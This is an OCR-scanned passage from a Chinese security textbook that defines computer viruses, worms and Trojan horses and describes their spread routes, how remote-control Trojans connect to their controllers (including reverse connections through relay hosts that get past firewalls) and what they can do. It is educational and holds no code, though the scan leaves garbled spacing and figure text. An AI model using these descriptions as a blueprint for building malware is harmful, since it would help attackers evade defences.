机 寄生 为 主 。 因 此 ， 出 现 了 对 计算 机 病毒 的 如 下 定义 

计算 机 病毒 是 一 段 可 以 通过 自我 传播 的 破坏 性 程序 或 代码 ， 其 需要 用 户 的 干预 来 触 
发 执行 ， 通 常 其 使 用 系统 的 正常 功能 进行 传播 。 

按 此 观点 ， 下 节 提 到 的 “漏洞 利用 类 蠕虫 与 口令 破解 类 蠕虫 ”之 外 的 其 他 几 类 蠕虫 
都 应 属于 计算 机 病毒 范畴 。 
443.2 ”计算 机 病毒 的 特点 

计算 机 病毒 的 特征 可 以 归纳 为 传染 性 ， 程 序 性 ， 破 坏 性 ， 非 授权 性 ， 隐 蔽 性 ， 潜 伏 
性 ， 可 触发 性 和 不 可 预见 性 。 

1. 传播 性 

传播 性 是 指 计 算 机 病毒 具有 将 自身 感染 〈 复 制 ) 到 目标 程序 或 目标 系统 的 能 力 。 是 
否 具 有 传播 性 是 判别 一 个 程序 是 否 为 计算 机 病毒 的 最 重要 条 件 之 一 。 

2. 程序 性 

计算 机 病毒 是 计算 机 程序 ， 需 要 依赖 于 特定 的 程序 环境 。 

3. 破坏 性 

病毒 一 旦 侵入 系统 都 会 对 系统 的 运行 造成 不 同 程度 的 影响 。 该 部 分 特性 与 病毒 作者 
编写 病毒 的 目的 有 很 大 关系 。 辟 如， 有 些 病毒 用 来 盗 取 用 户 各 类 账号 密码 ， 有 些 病 毒 则 
用 来 将 被 控制 主机 作为 僵尸 程序 以 对 指定 目标 发 起 拒绝 服务 攻击 等 。 

4. 非 授权 性 

一 般 正 常 的 程序 是 由 用 户 调用 ， 再 由 系统 分 配 资源 ， 完 成 用 户 交 给 的 任务 ， 其 目的 
对 用 户 是 可 见 的 透明 的 。 而 病毒 具有 程序 的 一 切 特性 ， 但 它 隐 藏 在 正常 程序 中 。 当 用 户 
调用 正常 程序 时 ， 其 窃取 到 系统 的 控制 权 ， 先 于 正常 程序 执行 病毒 的 动作 ， 其 对 用 户 是 
未 知 的 ， 是 未 经 用 户 允 许 的 ， 因 此 其 对 系统 而 言 是 未 授权 的 。 

5. 隐蔽 性 

第 一 , 病毒 程序 代码 应 该 简洁 短小 ; 第 二 ， 其 附着 在 正常 程序 或 磁盘 较 隐 蔽 的 地 方 ， 
也 有 少 部 分 以 隐藏 文件 的 形式 出 现 ,或 者 病毒 本 身 会 使 用 Rootkit 技术 对 自身 的 痕迹 进行 
隐藏 ， 第 三 ， 病 毒 取 得 系统 控制 权 后 ， 系 统 仍 能 正常 运行 ， 使 用 户 不 会 感到 任何 异常 。 
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6. 潜伏 性 

大 部 分 病毒 感染 系统 后 不 会 马上 作 ， 它 可 长 期 隐藏 在 系统 中 ， 只 有 在 满足 其 特定 条 
件 时 才 启 动 其 表现 模块 。 

7. 可 触发 性 


病毒 一 般 都 有 一 个 或 者 几 个 触发 条 件 。 如 果 满 足 其 触发 条 件 ， 激 活 病毒 的 传染 机 制 
进行 感染 ， 或 者 激活 病毒 的 表现 部 分 或 破坏 部 分 。 

8. 不 可 预见 性 

从 对 病毒 的 检测 方面 来 看 ， 病 毒 还 有 不 可 预见 性 。 
4.4.3.3 ”计算 机 病毒 的 生命 周期 

一 个 计算 机 病毒 程序 的 整个 生命 周期 一 般 由 如 下 4 个 阶段 组 成 : 

潜伏 阶段 :该 阶段 病毒 处 于 休眠 状态 ， 这 些 病 毒 最 终 会 被 某 些 条 件 〈 如 日 期 ， 某 特 
定 程 序 或 特定 文件 的 出 现 ， 内 存 的 容量 超过 一 定 范围 等 ) 所 激活 。 当 然 ， 并 不 是 所 有 的 
病毒 都 经 历 此 阶段 。 

传播 阶段 : 病毒 程序 将 自身 复制 到 其 他 程序 或 磁盘 的 某 个 区 域 上 ， 或 者 传播 到 其 他 
计算 机 中 ， 每 个 被 感染 的 程序 或 者 计算 机 又 因此 包含 了 病毒 的 复制 品 ， 从 而 也 就 进入 了 
传播 阶段 。 

触发 阶段 : 病毒 在 被 激活 后 ， 会 执行 某 一 特定 功能 从 而 达到 某 种 目的 。 和 处 于 潜伏 
期 的 病毒 一 样 ， 触 发 阶段 病毒 的 触发 条 件 是 一 些 系 统 事件 ， 壁 如 可 以 为 病毒 复制 自身 的 
次 数 ， 也 可 以 是 系统 日 期 或 者 时 间 ， 如 CIH1.2 病毒 于 4 月 26 日 爆发 。 

发 作 阶段 :病毒 在 触发 条 件 成 熟 时 ， 即 可 在 系统 中 发 作 。 由 病毒 发 作 体现 出 来 的 破 
坏 程度 是 不 同 的 ， 有 些 是 无 害 的 ， 有 些 则 给 系统 带 来 巨大 危害 。 
4.4.3.4 ”计算 机 病毒 传播 途径 

随 着 网 络 技术 的 快速 发 展 和 计算 机 的 广泛 普及 ， 计 算 机 病毒 的 传播 途径 也 越 来 越 多 。 

计算 机 病毒 的 传播 途径 可 以 大 致 分 为 如 下 几 类 : 

1. 通过 软盘 、 光 盘 传 播 

软盘 作为 最 常用 的 交换 媒介 ， 在 早期 的 计算 机 应 用 中 对 病毒 的 传播 产生 了 重要 的 作 
用 ， 因 为 那 时 计算 机 应 用 比较 简单 ， 可 执行 文件 和 数据 文件 系统 都 较 小 ， 许 多 执行 文件 
都 需要 通过 软盘 相互 复制 、 安 装 ， 这 样 就 能 通过 软盘 传播 文件 型 病毒 ， 另 外 ， 在 通过 软 
盘 引 导 机 器 时 ， 引 导 区 病毒 会 在 软盘 与 硬盘 引导 区 内 互相 感染 。 因 此 软盘 也 成 了 计算 机 
病毒 主要 的 寄生 “温床 ” 软磁盘 在 21 世纪 之 前 使 用 比较 频繁 ， 这 也 是 之 前 计算 机 病毒 
传播 的 最 主要 方式 。 

光盘 因为 容量 大 ， 可 以 存储 大 量 数据 ， 光 盘 成 为 目前 软件 和 数据 交换 最 主要 的 方式 
之 一 。 而 大 量 的 病毒 就 有 可 能 藏身 于 光盘 中 。 对 于 只 读 式 光盘 ， 由 于 不 能 进行 写 操作 ， 
因此 光盘 上 的 病毒 不 能 清除 。 在 以 谋 利 为 目的 非法 盗版 软件 制作 过 程 中 ， 病 毒 极 易 侵 入 
和 扩散 。 当 前 ， 资 版 光盘 的 泛滥 给 病毒 的 传播 带 来 了 极 大 的 便利 ， 甚 至 有 些 盗版 光盘 上 
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的 反 病毒 软件 本 身 就 带 有 病毒 ， 这 就 给 本 来 “干净 ”的 计算 机 带 来 了 灾难 。 

另外 ， 用 户 自己 在 进行 光盘 刻录 备份 数据 时 ， 也 可 能 将 被 感染 计算 机 病毒 的 程序 刻 
录 备 份 。 

2. 通过 移动 存储 设备 传播 

随 着 文件 交换 和 共享 需求 的 急剧 增加 ， 移 动 硬盘 、U 盘 、MP3 等 可 移动 介质 被 黑客 
广泛 利用 来 传播 病毒 。 只 要 U 盘 在 中 毒 计算 机 上 使 用 过 ， 就 会 被 植 入 病毒 ， 当 它 被 接 入 
其 他 计算 机 使 用 时 ， 就 会 感染 更 多 的 计算 机 系统 。 

移动 存储 设备 是 计算 机 病毒 曾经 最 流行 的 传播 方式 之 一 ， 相 当 一 部 分 计算 机 病毒 都 
利用 动 存储 设备 进行 传播 。 

EDI U 盘 病 毒 传播 的 方式 主要 有 以 下 几 种 : 

@ 通过 autorun.inf 文件 进行 传播 的 〈U 盘 病 毒 曾经 最 普遍 的 传播 方式 )。 

@ 伪装 成 其 他 文件 ， 病 毒 把 U 盘 下 所 有 文件 夹 隐藏 ， 并 把 自己 复制 成 与 原文 件 夹 
名 称 相同 的 具有 文件 夹 图 标的 文件 ， 当 用 户 点 击 时 病毒 会 执行 自身 并 且 打 开 隐 藏 的 该 名 
称 的 文件 夹 。 

@ 通过 可 执行 文件 感染 传播 ， 很 传统 的 一 种 传播 手段 ， 但 是 依然 有 效 。 

@ 利用 系统 漏洞 进行 传播 。 辟 如 Stuxnet 利用 Ink 漏洞 进行 自动 传播 。 

作为 移动 存储 介质 使 用 最 频繁 的 场所 ， 打 印 社 、 计 算 机 机 房 和 多 媒体 教室 目前 已 经 
成 为 计算 机 病毒 传播 的 主要 场所 。 

3. 通过 网 络 传播 

计算 机 网 络 是 目前 计算 机 病毒 急速 增长 、 种 类 快速 增加 的 直接 推动 力 。 几 乎 任何 一 
种 网 络 应 用 都 可 能 成 为 计算 机 病毒 传播 的 有 效 渠 道 。. 计 算 机 病毒 常见 的 网 络 传播 方式 有 : 

。 通过 局 域 网 共享 文件 夹 传 播 

。 通过 穷 举 局 域 网 其 他 计算 机 的 管理 员 弱 口令 进行 入 侵 传播 

。 电子 邮件 〈 如 邮件 附件 ， 或 者 带 恶意 程序 的 邮件 正文 等 ) 
。 各 类 即时 通信 软件 (如 QQ MSN, Skype 等 ) 


利用 各 类 浏览 器 漏洞 〈 如 TE, Firefox, Opera 等 ) 的 网 页 挂 马 
P2P 下 载 渠 道 (如 BT、 电 驴 等 ) 

。 各 类 软件 下 载 站 点 

各 类 应 用 软件 漏洞 

。 各 类 系统 漏洞 

。 利用 ARP 欺骗 进行 扩散 

。 无 线 设备 传播 


4.4.4 ”网 络 蠕虫 


1982 年 ，Shoch 和 Hupp 根据 The Shockwave Rider 一 书 中 的 概念 提出 了 “蠕虫 ” 
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(Worm) 程序 的 思想 ， 其 主要 用 于 寻找 空闲 主机 资源 进行 分 布 式 计算 。 这 种 “蠕虫 ” 程 
序 常 驻 于 一 台 或 多 台 计 算 机 中 ， 并 有 自动 重新 定位 的 能 力 。 如 果 它 检测 到 网 络 中 的 某 台 
计 主 机 未 被 感染 ， 它 就 把 自身 的 一 个 拷贝 发 送 给 那 台 主机 。 每 个 程序 都 能 把 自身 的 拷贝 
重新 植 入 到 另 一 台 主机 中 ， 并 且 能 识别 那 台 主机 。 

这 段 对 蠕虫 的 描述 给 出 了 在 当时 发 展 环境 下 蠕虫 最 重要 的 两 个 特征 :“ 可 以 从 一 台 
计算 机 移动 到 另 一 台 计 算 机 ”， 以 及 “可 以 自我 复制 ”。 但 此 时 人 们 并 未 对 蠕虫 与 病毒 做 
出 严格 区 分 。 

在 1988 年 莫 里 斯 晴 虫 爆发 之 后 ，Eugene H. Spafford 在 “The Internet worm program: 
An analysis” 一 文中 对 蠕虫 做 出 了 重新 定义 以 区 分 计算 机 病毒 和 蠕虫 ， 他 认为 “里 虫 是 
一 类 可 以 独立 运行 、 并 能 将 自身 的 一 个 包含 了 所 有 功能 的 版 本 传播 到 其 他 计算 机 上 的 程 
序 ”。 而 与 此 对 应 ， 他 对 计算 机 病毒 的 定义 是 “计算 机 病毒 是 一 段 代 码 ， 能 把 自身 加 到 其 
他 程序 包括 操作 系统 上 ; 它 不 能 独立 运行 ， 需 要 由 它 的 宿主 程序 运行 来 激活 它 ” 

该 定义 主要 将 独立 性 (“是 否 可 以 独立 运行 、 是 否 为 独立 个 体 ”) 作为 区 分 计算 机 病 
毒 和 网 络 蠕虫 的 主要 依据 。 按 此 定义 ， 网 络 蠕虫 又 可 分 为 漏洞 利用 类 蠕虫 、 口 令 破 解 
类 蠕虫 、 电 子 邮 件 类 蠕虫 、 即 时 通信 工具 类 蠕虫 、IRC 类 蠕虫 、P2P 类 蠕虫 ， 以 及 本 地 
蠕虫 (如 利用 本 地 复制 及 可 移动 存储 设备 进行 传播 ) 等 。 

卡巴 斯 基 在 对 蠕虫 进行 命名 分 类 ?时 ， 主 要 将 其 划分 为 :Net-Worm、Email-Worm、 
IM-Worm, IRC-Worm, P2P-Worm 等 , 在 威胁 程度 上 , Net-Worm>Email-Worm>IM-Worm, 
IRC-Worm, P2P-Worm. 

但 是 对 这 些 不 同类 别 的 蠕虫 而 言 ， 口 令 破 解 类 与 漏洞 利用 类 蠕虫 与 其 他 类 别 蠕虫 在 
传播 特征 上 存在 重大 差异 ， 前 两 者 利用 系统 的 缺陷 和 漏洞 进行 自主 传播 ， 其 传播 过 程 不 
需要 计算 机 使 用 者 进行 干预 ， 而 其 他 类 别 蠕虫 在 往 其 他 主机 传播 的 过 程 中 都 需要 计算 机 
使 用 者 的 干预 (如 选择 邮件 正文 或 打开 附件 、 点 击 网 址 链接 、 点 击 文件 接收 按钮 、 使 用 
或 双击 可 移动 存储 设备 等 ), 方 能 在 目标 主机 得 到 再 次 执行 和 继续 传播 的 机 会 。 而 是 否 具 
备 这 种 主动 攻击 特征 ， 导 致 不 同 的 蠕虫 在 传播 特性 上 存在 很 大 区 别 ， 在 对 应 的 防护 措施 
上 ， 也 存在 较 大 不 同 。 

A Morris 蠕虫 爆发 以 来 ， 随 着 各 类 漏洞 的 不 断 爆 出 ,漏洞 利用 类 蠕虫 事件 不 断 ， 壁 
如 ，2001 年 红色 代码 (CodeRed) 和 尼 姆 达 (Nimda), 2003 年 蠕虫 王 〈Slammer)、 冲 
击 波 (MSBlaster), 2004 年 震荡 波 (sasser),2005 年 极速 波 (Zotob),2006 年 魔 波 (MocBot)， 
2008 年 扫荡 波 (saodangbo), 2009 年 飞 客 (Conficker), 2010 年 震 网 (StuxNet) 等 ，2003 


@ Spafford EH. The Internet worm program: An analysis. Technical Report, CSD-TR-823, West 
Lafayette: Department of Computer Science, Purdue University, 1988. 1~29. 

© 卡巴 斯 基 对 恶意 代码 进行 分 类 时 ， 其 按照 威胁 程度 高 低 构建 了 恶意 软件 分 类 树 (The malware 
classification tree)， 并 以 此 制定 其 命名 和 分 类 规则 。 具体 请 访问 : Types of Malware, http://usa.kaspersky. 
com/internet-security-center/threats/malware-classifications。 
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年 爆发 的 口令 蠕虫 则 是 口令 破解 类 蠕虫 的 典型 代表 。 

另外 ， 部 分 蠕虫 (如 Slammer， 其 为 376 字 节 的 UDP 数据 包 ) 仅 存在 于 内 存 之 中 
其 并 不 产生 任何 独立 的 文件 ， 其 也 无 法 独立 运行 ， 如 果 以 “独立 性 ”作为 病毒 与 蠕虫 的 
区 分 标准 ， 这 部 分 蠕虫 可 能 不 能 归于 蠕虫 之 列 。 

在 计算 机 病毒 与 蠕虫 的 分 类 上 ， 目 前 存在 不 同 的 观点 。 

2003 年 ， 南 开 大 学 郑 辉 博士 在 其 博士 论文 “Intemet 蠕虫 研究 ”中 对 蠕虫 是 这 样 定 
义 的 :“ 网 络 蠕虫 是 无 须 计算 机 使 用 者 干预 即 可 运行 的 独立 程序 , 它 通 过 不 停 地 获得 网 络 
中 存在 漏洞 的 计算 机 上 的 部 分 或 全 部 控制 权 来 进行 传播 . ”他 认为 ， 蠕 虫 具有 主动 攻击 、 
行踪 隐蔽 、 利 用 漏洞 、 造 成 网 络 拥塞 、 降 低 系 统 性 能 、 产 生 安全 隐患 、 反 复 性 和 破坏 性 
等 特征 。2004 年 ， 在 此 基础 之 上 ， 中 科 院 文 伟 平 博士 等 在 “网 络 蠕虫 研究 与 进展 ”一 
文中 ， 也 给 出 了 相应 的 定义 :“ 网 络 蠕虫 是 一 种 智能 化 、 自 动 化 ， 综 合 网 络 攻击 、 密 码 
学 和 计算 机 病毒 技术 ， 不 需要 计算 机 使 用 者 干预 即 可 运行 的 攻击 程序 或 代码 。 它 会 扫描 
和 攻击 网 络 上 存在 系统 漏洞 的 节点 主机 ， 通 过 局 域 网 或 者 国际 互联 网 从 一 个 节点 传播 到 
另外 一 个 节点 。 

这 一 观点 更 加 凸显 了 蠕虫 的 “攻击 主动 性 ” 并且 可 以 将 slammer 等 这 一 类 无 独立 文 
件 、 不 能 独立 运行 的 蠕虫 纳入 到 蠕虫 范畴 。 可 见 ， 此 观点 认为 ， 独 立 性 作为 蠕虫 区 别 于 
计算 机 病毒 的 重要 依据 已 经 不 够 准确 ， 而 是 否 需 要 人 工 干预 来 触发 执行 ， 是 否 通 过 漏洞 
获取 网 络 中 目标 计算 机 的 控制 权 来 进行 自动 传播 ， 应 当 作为 区 分 蠕虫 与 计算 机 病毒 的 重 
要 依据 之 一 。 


4.4.5 特洛伊 木马 


特洛伊 木马， 简称 木马 ， 英 文 名 为 Trojan horse. 

特洛伊 木马 的 故事 出 自古 希腊 传说 : 希腊 联军 围困 特洛伊 久 攻 不 下 , 于 是 假装 撤退 ， 
留 下 一 具 巨 大 的 中 空 木马 ， 特 洛 伊 守 军 不 知 是 计 ， 将 木马 运 进 城中 作为 战利品 。 夜 深入 
静 之 际 ， 木 马 腹 中 躲藏 的 希腊 士兵 打开 城 门 ， 特 洛 伊 沦陷 。 

作为 恶意 软件 中 最 重要 的 两 大 类 ， 木 马 与 病毒 一 直 是 人 们 关注 的 焦点 。 但 是 木马 与 
病毒 不 同 ， 它 不 以 破坏 目标 计算 机 系统 为 主要 目的 ， 同 时 在 主机 间 没 有 感染 性 ， 因 而 以 
前 一 直 不 是 反 恶 意 软 件 厂商 关注 的 重点 。 

但 随 着 网 络 业 务 和 用 户 群 体 数量 的 变化 ， 木 马 的 发 展 呈 现 出 愈演愈烈 的 趋势 ， 其 危 
害 性 早已 超过 病毒 。 主 要 原因 是 木马 往往 以 获取 经 济 、 政 治 利益 为 目的 ， 具 有 很 强 的 针 
对 性 。 目 前 ， 木 马 已 经 成 为 所 有 恶意 软件 中 占据 比重 最 大 的 一 类 恶意 程序 。 

在 古 希腊 传说 中 ,特洛伊 木马 表面 上 是 “礼物 ”， 但 实际 上 藏匿 了 袭击 特洛伊 城 的 


® 郑 辉 . mtemet 蠕虫 研究 [博士 学 位 论文 ] 天津 : 南开 大 学 信息 技术 科学 学 院 ，2003. 
© HEE: 网 络 蠕虫 研究 与 进展 . 软件 学 报 ，2004,15(8): 1208-1219 


第 4 章 信息 系统 安全 基础 


希腊 士兵 。 现 在 ， 特 洛 伊 木 马 〈 以 下 简称 木马 ) 是 指 表 面 上 有 用 、 实 际 目的 却 是 危害 计 
算 机 安全 并 导致 严重 破坏 的 计算 机 程序 ， 是 一 种 附着 在 正常 应 用 程序 中 或 者 单独 存在 的 
一 类 恶意 程序 。 木 马 程序 通常 是 目标 用 户 被 欺骗 之 后 自己 触发 执行 的 。 与 计算 机 病毒 和 
网 络 蠕虫 相 比 , 特洛伊 木马 不 能 进行 自我 传播 。 木马 同样 具有 隐蔽 性 和 非 授 权 性 的 特点 。 

按照 木马 的 行为 和 功能 特征 ， 特 洛 伊 木 马 又 可 以 分 为 多 种 ， 如 远程 控制 型 木马 、 信 
息 窃 取 型 木马 、 破 坏 型 木马 等 。 

卡巴 斯 基 在 对 木马 进行 命名 分 类 ?时 ， 按 照 木马 行为 和 功能 采用 了 : Trojan-Bank、 
Trojan-DDoS, Trojan-Downloader, Trojan-Dropper, Trojan-FakeAV, Trojan-GameThief, 
Trojan-IM, Trojan-Ransom, Trojan-SMS, Trojan-Spy、 Trojan-Mailfinder, Trojan-ArcBomb, 
Trojan-Clicker, Trojan-Notifier, Trojan-Proxy, Trojan-PSW 等 命名 方式 , 同时 将 Backdoor、 
Exploit, Rootkit 进行 了 单独 命名 ， 但 依然 归 在 了 木马 之 列 。 其 中 ， 远 程控 制 型 木马 被 归 
为 Backdoor。 

远程 控制 型 木马 一 般 都 有 客户 端 和 服务 端 两 个 执行 程序 ， 其 中 客户 端 程序 用 于 攻击 
者 远程 控制 已 植 入 木马 的 计算 机 ， 或 者 获取 来 自 被 植 入 木马 主机 的 数据 ， 服 务 端 程序 就 
是 在 用 户 计 算 机 中 的 木马 程序 。 通 过 远程 控制 型 木马 ， 黑 客 可 以 远程 管理 目标 主机 的 文 
件 系 统 、 服 务 、 注 册 表 ， 可 以 进行 屏幕 控制 、 摄 像 头 监视 、 麦 到 风 监 听 、 键 盘 记录 ， 也 
可 以 通过 远程 Shell 进行 命令 操作 或 进一步 植 入 功能 更 加 强大 的 第 三 方 恶 意 软件 等 。 黑 
客 通过 远程 计算 机 控制 植 入 “木马 ”的 电脑 ， 就 像 使 用 自己 的 电脑 一 样 ， 这 对 于 网 络 个 
人 用 户 来 说 是 极其 可 怕 的 。 典 型 的 远程 控制 型 木马 有 冰河 、 网 络 神偷 、 广 外 女生 、 网 络 
公牛 、 黑 洞 、 上 兴 、 彩 虹桥 、Posion ivy、PCShare、 灰 铝 子 等 。 这 类 木马 比较 强调 远程 
实时 交互 性 ， 攻 击 者 会 频繁 利用 网 络 通 信 对 受害 者 电脑 发 布 指令 。 卡 巴 斯 基 分 类 体系 中 
木马 子 类 下 的 BackDoor， 可 以 归于 这 一 类 别 。 

信息 获取 型 木马 则 以 获取 受害 者 电脑 上 相关 个 人 信息 为 主要 目的 ， 最 典型 的 就 是 各 
类 盗号 木马 。 但 其 服务 端 与 客户 端 交 互 性 不 如 远程 控制 型 木马 强 ， 攻 击 者 与 受害 者 之 间 
的 网 络 通信 以 信息 传输 为 主 。 辟 如， 卡巴 斯 基 分 类 体系 中 木马 子 类 下 的 Trojan-Bank、 
Trojan-GameThief、Trojan-IM、Trojan-Spy、Trojan-PSW、Trojan-Mailfinder 都 可 以 归于 
这 一 类 别 。 

破坏 型 木马 则 以 对 本 地 或 远程 主机 系统 中 的 数据 破坏 、 资 源 消耗 为 主 。 壁 如 ， 
Trojan-DDoS、Trojan-Ransom、Trojan-ArcBomb 等 可 以 归于 这 一 类 别 。 

另外 ， 还 有 一 些 木马 程序 ， 自 身 并 没有 直接 破坏 性 ， 但 可 能 释放 和 下 载 其 他 恶意 程 
序 到 系统 之 中 给 系统 带 来 更 大 的 危害 。 如 卡巴 斯 基 命 名 体系 下 的 Trojan-Downloader、 
Trojan-Dropper 等 。 
445.1 ”远程 控制 型 木马 的 两 种 典型 连接 方式 

按照 木马 客户 端 和 服务 端 之 间 建 立 连接 的 方式 的 不 同 ， 可 以 将 木马 分 为 正 向 连接 木 


© 具体 可 访问 : What is a Trojan Virus? https://usa.kaspersky.com/internet-security-center/threats/trojans 
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马 和 反 向 连接 木马 。 

1. 正 向 连接 

正 向 连接 木马 的 连接 过 程 为 : 控制 端 首先 发 起 通信 连接 的 请 求 ， 然 后 木马 被 控制 端 
响应 并 建立 半 连 接 , 等 控制 端 响应 后 , 木马 被 控制 端 最 终 建立 一 个 与 控制 端的 通信 连接 。 

正 向 连接 是 最 传统 的 连接 方式 ， 为 了 实现 正 向 连接 ， 服 务 端 必 须 具 有 公 网 卫 ， 而 攻 
击 者 (客户 端 ) 则 无 须 公 网 耳 。 因 为 木马 服务 端 中 也 没有 攻击 者 的 相关 地 址 信息 ， 采 用 
此 种 方式 的 木马 也 可 以 较 好 地 隐藏 攻击 者 ， 增 加 对 攻击 者 定位 的 难度 。 但 由 于 其 采用 由 
外 向 内 的 连接 ,因此 其 容易 被 防火 墙 阻 断 而 导致 连接 失败 。 同 时 ， 由 于 服务 端的 IP 地 址 
可 能 会 经 常 变化 ， 服 务 端的 上 线 时 间 也 并 不 确定 ， 这 些 都 会 给 攻击 者 连接 被 攻击 者 带 来 


一 定 困难 。 
Gy OERA TCP AE Q a ATE 
QY EF. HAN < BRE 


被 控 端 (服务 端 ) 控制 端 (客户 端 ) 


客户 端 连 接 服务 器 端口 


经 过 TCP 
三 次 握 
手 建立 


发 送 控制 命令 
返回 目标 机 器 上 的 信息 


g 
图 4-11 木马 TCP 正 向 连接 方式 


由 于 动态 也、 防火 墙 过 滤 技术 、 内 网 访问 限制 等 因素 的 存在 ， 阻 挡 了 许多 木马 的 交 
互 ， 使 得 中 了 木马 的 计算 机 无 法 与 控制 端 联 系 。 这 样 ， 反 向 连接 方式 就 显得 非常 必要 。 

2. 反 向 连接 

反 向 连接 木马 ， 也 称 反 弹 式 木马 ， 其 连接 过 程 是 : 控制 端 首先 打开 端口 进行 监听 ， 
被 控制 端 主动 与 控制 端的 监听 端口 进行 连接 。 木 马 控制 端 发 现 被 控制 端 请 求 之 后 给 出 提 
示 ， 然 后 控制 者 开始 对 被 控制 端 主机 进行 控制 操作 。 

反 向 连接 技术 是 为 了 便于 穿 过 防火 墙 而 发 展 起 来 的 。 由 于 防火 墙 对 于 由 外 向 内 的 连 
接 往往 会 进行 严格 的 过 滤 ， 但 是 对 于 由 内 往外 的 连接 则 相对 更 加 宽松 ， 因 此 采用 由 内 向 
外 的 反 向 连接 技术 是 规避 防火 墙 过 滤 的 有 效 手段 。 
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反 向 连接 主要 有 两 种 实现 形式 : 一 种 是 控制 端 〈 客 户 端 ) 与 被 控制 端 〈 服 务 端 ) 独 
立 完成 的 ， 另 一 种 是 借助 第 三 方 主机 中 转 完 成 的 。 


& 连接 控制 端 & 


控制 端 (客户 端 ) 被 控 端 (服务 端 ) 


防火 墙 允 许 通过 
图 4-12 不 依赖 于 第 三 方 的 直接 反 向 连接 


采用 反 向 连接 的 木马 可 以 有 效 地 突破 防火 墙 从 而 建立 连接 ， 但 这 样 一 来 在 木马 的 被 
控制 端 〈 服 务 端 ) 程序 中 便 会 存 有 木马 控制 端 (客户 端 ) 的 连接 信息 。 因 此 一 旦 木马 样 
本 被 捕获 ， 控 制 端 〈 客 户 端 ) 的 地 址 信息 也 随 之 暴露 ， 便 可 以 较 容易 地 追查 到 攻击 者 。 
另外 ， 在 这 种 连接 模式 下 ， 木 马 控制 端 ( 客 户 端 ) 也 必须 拥有 外 部 IP 以 供 被 控 端 (服务 
端 ) 发 起 连接 。 

反 向 连接 型 木马 除了 可 以 较 好 地 突破 防火 墙 外 ， 还 可 以 第 一 时 间 获 取 被 控 端 (服务 
端 ) 的 上 线 信息 ， 随 时 了 解 被 控 主 机 的 上 线 状 况 ， 随 时 对 被 控 主机 进行 相关 操作 ， 上 有 具有 
较 好 的 实时 性 。 同 时 也 可 以 控制 局 域 网 内 部 的 目标 主机 。 

在 有 些 情况 下 ， 攻 击 者 为 了 隐藏 自己 ， 并 且 获 得 较 好 的 连接 成 功率 ， 可 以 采用 另 一 
种 反 向 连接 形式 : 控制 端 与 被 控 端 两 个 主机 间 不 直接 进行 通信 ， 而 是 通过 第 三 方 的 主机 
来 进行 中 转 。 这 种 第 三 方 主机 通常 是 已 控制 的 肉鸡 ， 也 就 是 已 被 黑客 控制 的 机 器 。 使 用 
肉鸡 的 好 处 在 于 不 但 可 以 更 容易 地 绕 过 防火 墙 ， 被 控 端 〈 服 务 端 ) 也 可 以 自动 连接 控制 
端 (客户 端 ) 还 可 以 较 好 地 保护 攻击 者 真实 的 主机 地 址 信息 。 但 带 来 的 缺点 就 是 必须 拥 
有 稳定 的 肉鸡 ， 这 里 的 稳定 性 包括 主机 能 被 长 期 控制 的 稳定 性 ， 以 及 肉鸡 主机 本 身 系统 
的 稳定 性 ， 以 及 肉鸡 主机 上 线 时 间 的 稳定 性 。 

对 于 反 向 连接 来 说 ， 并 不 总 是 需要 这 么 强大 功能 的 肉鸡 ， 有 时 只 要 求 其 具有 连接 代 
理 的 功能 就 可 以 了 ， 甚 至 更 简单 的 拥有 一 个 共同 的 第 三 方 存储 空间 即 可 ， 双 方 都 可 以 向 
第 三 方 空间 发 送 和 下 载 数据 。 例 如 ， 通 常 可 以 使 用 一 个 公开 的 HITP 空间 作为 第 三 方 存 
储 空间 。 这 种 反 向 连接 方式 不 需要 客户 端 主 机 具有 公有 也， 因此 更 加 灵活 。 
4.4.5.2 ”远程 控制 型 木马 的 常见 控制 功能 

木马 的 常见 功能 有 : 主机 信息 管理 、 文 件 系统 管理 、 屏 幕 监视 和 控制 、 密 码 截 获 、 
注册 表 管 理 、 服 务 管 理 、 进 程 管理 、 键 盘 记录 、Shell 控制 等 功能 。 

1. 主机 信息 管理 

包括 列举 主机 的 CPU、 内 存 大 小 、 操 作 系统 类 型 、 登 录 账户 、IP 地 址 、 主 机 名 、 
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MAC 地 址 等 。 

2. 文件 系统 管理 

通常 包括 文件 查看 、 上 传 、 下 载 、 更 名 、 新 建文 件 (文件 夹 )、 修 改 文件 属性 等 。 

3. 屏幕 监视 与 控制 

通常 大 多 数 木 马 都 会 提供 屏幕 监视 的 功能 ， 这 样 可 以 查看 到 被 控制 者 的 屏幕 活动 ， 
在 提供 屏幕 监视 时 ,考虑 到 网 络 带 宽 的 问题 有 时 候 也 会 提供 屏幕 画面 质量 选择 。 另 外 ， 
会 有 些 木 马 也 会 提供 简单 的 键盘 和 鼠标 控制 功能 。 

4. 密码 截获 

密码 截获 模块 会 对 被 控制 主机 的 各 类 邮箱 、 即 时 通信 工具 和 其 他 账户 的 密码 进行 
截获 。 

5. 注册 表 管理 

该 功能 类 似 于 本 机 的 注册 表 管 理 程序 Regedit 的 功能 。 有 些 木马 不 具备 该 功能 ， 
者 只 是 简单 地 提供 一 些 注册 表 键 值 查看 和 添加 命令 。 

6. 服务 管理 

通常 可 以 对 服务 进行 查看 、 增 加 、 修 改 ， 也 可 以 启动 、 暂 停 或 者 恢复 等 操作 。 

7. 进程 管理 

可 以 查看 目标 主机 目前 正在 运行 的 进程 名 、PID 等 。 同 时 也 可 以 进程 进行 暂停 、 
止 等 操作 。 

8. 键盘 记录 

用 来 记录 用 户 的 所 有 键盘 击 键 记 录 。 

9. Shell 控制 

用 来 获得 一 个 命令 行 的 Shell， 可 以 在 该 Shell 中 执行 系统 命令 、 启 动 各 类 程序 。 

尽管 木马 可 以 具备 非常 丰富 的 功能 ， 但 是 有 时 候 木 马 的 功能 却 并 不 是 最 主要 的 ， 一 
个 优秀 的 木马 同时 应 该 具备 卓越 的 性 能 ， 目 前 大 多 数 木 马 设计 者 都 必须 充分 考虑 反 病毒 
软件 对 抗 和 防火 墙 穿 透 等 方面 的 问题 。 
4.4.5.3 ”远程 控制 型 木马 的 其 他 功能 

1. 隐藏 功能 

木马 是 以 非 授权 的 手段 获取 电脑 的 控制 权 ， 因 此 隐蔽 性 是 其 最 基本 的 功能 。 木 马 以 
隐藏 功能 确保 其 隐蔽 性 ， 具 体 可 分 为 三 个 方面 : 运行 形式 的 隐藏 、 通 信 形 式 的 隐藏 、 存 
在 形式 的 隐藏 。 

(1) 运行 形式 的 隐藏 

木马 程序 在 运行 过 程 中 会 具有 一 定 的 运行 形式 ， 如 线程 、 进 程 等 。 为 实现 木马 运行 
